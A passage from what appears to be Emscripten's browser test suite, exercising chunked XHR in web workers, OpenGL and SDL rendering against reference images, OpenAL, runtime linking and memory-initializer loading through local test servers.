self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
self.emcc_args += ['-Wno-pointer-sign', '-Wno-int-conversion']
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS=1', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
if not wasm and self.is_wasm_backend():
continue
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
